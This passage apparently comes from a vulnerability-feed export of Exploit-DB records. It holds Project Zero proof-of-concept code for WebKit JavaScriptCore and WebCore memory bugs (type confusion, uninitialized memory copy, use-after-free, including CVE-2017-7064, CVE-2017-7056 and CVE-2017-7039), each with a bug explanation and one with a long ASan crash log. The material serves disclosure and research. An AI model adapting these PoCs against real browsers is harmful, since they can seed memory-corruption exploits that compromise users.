{xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. 
So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case, which causes a type confusion.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n\r\nPoC:\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42666/"}, {"lastseen": "2017-07-25T21:42:24", "description": "WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy. CVE-2017-7064. Dos exploit for Multiple platform", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42375", "href": "https://www.exploit-db.com/exploits/42375/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1236\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n 
ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\n-->\r\n\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42375/"}, {"lastseen": "2017-07-25T21:42:26", "description": "WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling. CVE-2017-7056. 
Dos exploit for Multiple platform", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42376", "href": "https://www.exploit-db.com/exploits/42376/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262\r\n\r\nHere is a snippet of ArgumentsEliminationPhase::transform\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. 
So in the case where the condition is not satisfied, the arguments object created by the following code (CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\nPoC:\r\n-->\r\n\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42376/"}, {"lastseen": "2017-07-24T19:42:14", "description": "WebKit - 'WebCore::Node::nextSibling' Use-After-Free. CVE-2017-7039. Dos exploit for Multiple platform. Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::Node::nextSibling' Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42362", "href": "https://www.exploit-db.com/exploits/42362/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241\r\n\r\nThere is a use-after-free security vulnerability in WebKit. 
The vulnerability was confirmed on an ASan build of WebKit nightly.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon 
(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, 
JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), 
WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc 
(/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in 
WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in 
WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in 
WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\nShadow bytes around the buggy address:\r\n 0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c1800016de0: fd fd fd fd fd fd fd fd fa 